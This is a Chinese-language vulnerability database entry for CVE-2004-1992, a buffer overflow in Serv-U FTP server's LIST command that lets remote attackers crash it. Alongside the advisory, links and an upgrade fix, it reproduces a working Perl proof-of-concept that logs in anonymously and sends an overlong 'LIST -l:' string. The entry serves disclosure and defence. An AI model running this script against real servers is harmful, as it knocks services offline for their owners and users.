CVE-2004-1992
CVSS5.0
发布时间 :2004-04-20 00:00:00
修订时间 :2016-10-17 23:04:26
NMCOE    

[原文]Buffer overflow in Serv-U FTP server before 5.0.0.6 allows remote attackers to cause a denial of service (crash) via a long -l parameter, which triggers an out-of-bounds read.


[CNNVD]Serv-U FTP服务器LIST命令超长-l参数远程缓冲区溢出漏洞(CNNVD-200404-075)

        
        Serv-U是一个Windows平台下使用非常广泛的FTP服务器软件。
        Serv-U在处理LIST命令对参数处理不正确,远程攻击者可以利用这个漏洞对FTP服务程序进行拒绝服务攻击,存在执行任意指令的可能。
        攻击者利用LIST -l:命令,提交超长字符串给SERV-U,可触发缓冲区溢出,导致服务程序崩溃,精心构建提交数据可能以进程权限执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CWE (弱点类目)

CWE-119 [内存缓冲区边界内操作的限制不恰当]

- CPE (受影响的平台与产品)

cpe:/a:serv-u:serv-u:3.1.0.1Serv-U 3.1.0.1
cpe:/a:serv-u:serv-u:3.1.0.0Serv-U 3.1.0.0
cpe:/a:serv-u:serv-u:3.0.0.16Serv-U 3.0.0.16
cpe:/a:serv-u:serv-u:5.0.0.4Serv-U 5.0.0.4
cpe:/a:serv-u:serv-u:3.0.0.17Serv-U 3.0.0.17
cpe:/a:serv-u:serv-u:4.0.0.4Serv-U 4.0.0.4
cpe:/a:serv-u:serv-u:4.1.0.0Serv-U 4.1.0.0
cpe:/a:serv-u:serv-u:4.1.0.3Serv-U 4.1.0.3
cpe:/a:serv-u:serv-u:3.1.0.3Serv-U 3.1.0.3
cpe:/a:serv-u:serv-u:5.0.0.0Serv-U 5.0.0.0

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1992
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1992
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200404-075
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=108360377119290&w=2
(UNKNOWN)  BUGTRAQ  20040503 Serv-U LIST -l Parameter Buffer Overflow
http://marc.info/?l=ntbugtraq&m=108359620108234&w=2
(UNKNOWN)  NTBUGTRAQ  20040503 Serv-U LIST -l Parameter Buffer Overflow
http://securitytracker.com/id?1009869
(UNKNOWN)  SECTRACK  1009869
http://www.securiteam.com/windowsntfocus/5ZP0G2KCKA.html
(VENDOR_ADVISORY)  MISC  http://www.securiteam.com/windowsntfocus/5ZP0G2KCKA.html
http://www.securityfocus.com/bid/10181
(VENDOR_ADVISORY)  BID  10181
http://xforce.iss.net/xforce/xfdb/15913
(VENDOR_ADVISORY)  XF  servu-list-command-bo(15913)

- 漏洞信息

Serv-U FTP服务器LIST命令超长-l参数远程缓冲区溢出漏洞
中危 边界条件错误
2004-04-20 00:00:00 2010-04-28 00:00:00
远程  
        
        Serv-U是一个Windows平台下使用非常广泛的FTP服务器软件。
        Serv-U在处理LIST命令对参数处理不正确,远程攻击者可以利用这个漏洞对FTP服务程序进行拒绝服务攻击,存在执行任意指令的可能。
        攻击者利用LIST -l:命令,提交超长字符串给SERV-U,可触发缓冲区溢出,导致服务程序崩溃,精心构建提交数据可能以进程权限执行任意指令。
        

- 公告与补丁

        厂商补丁:
        RhinoSoft
        ---------
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        
        http://www.serv-u.com/

- 漏洞信息 (24029)

RhinoSoft Serv-U FTP Server 3.x/4.x/5.0 LIST Parameter Buffer Overflow Vulnerability (EDBID:24029)
windows dos
2004-04-20 Verified
0 storm
N/A [点击下载]
source: http://www.securityfocus.com/bid/10181/info

Reportedly Serv-U is affected by a remote buffer overflow vulnerability in the list parameter. This issue is due to a failure of the application to properly validate buffer boundaries during processing of user input.

Successful exploitation would immediately produce a denial of service condition in the affected process. This issue may also be leveraged to execute code on the affected system with the privileges of the user that invoked the vulnerable application, although this has not been confirmed.

#!/usr/bin/perl

use IO::Socket;

$host = "www.example.com";

$remote = IO::Socket::INET->new ( Proto => "tcp",
     PeerAddr => $host,
     PeerPort => "2116",
    );

unless ($remote) { die "cannot connect to ftp daemon on $host" }

print "connected\n";
while (<$remote>)
{
 print $_;
 if (/220 /)
 {
  last;
 }
}

$remote->autoflush(1);

my $ftp = "USER anonymous\r\n";

print $remote $ftp;
print $ftp;
sleep(1);

while (<$remote>)
{
 print $_;
 if (/331 /)
 {
  last;
 }
}

$ftp = join("", "PASS ", "a\@b.com", "\r\n");
print $remote $ftp;
print $ftp;
sleep(1);

while (<$remote>)
{
 print $_;
 if (/230 /)
 {
  last;
 }
}

my $ftp = join ("", "LIST -l:", "A"x(134), "\r\n");

print $remote $ftp;
print $ftp;
sleep(1);

while (<$remote>)
{
 print $_;
 if (/250 Done/)
 {
  last;
 }
}

close $remote;		

- 漏洞信息

5546
Serv-U FTP Server LIST Command DoS
Remote / Network Access Denial of Service
Loss of Availability
Exploit Public

- 漏洞描述

A remote overflow exists in Serv-U FTP Server. The program fails to perform proper bounds checking resulting in a buffer overflow. By supplying a "-l" parameter with 134 bytes or more to the LIST command, an attacker can cause the service to crash resulting in a loss of availability for the FTP server.

- 时间线

2004-04-19 Unknow
2004-04-19 Unknow

- 解决方案

Upgrade to version 5.0.0.6 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站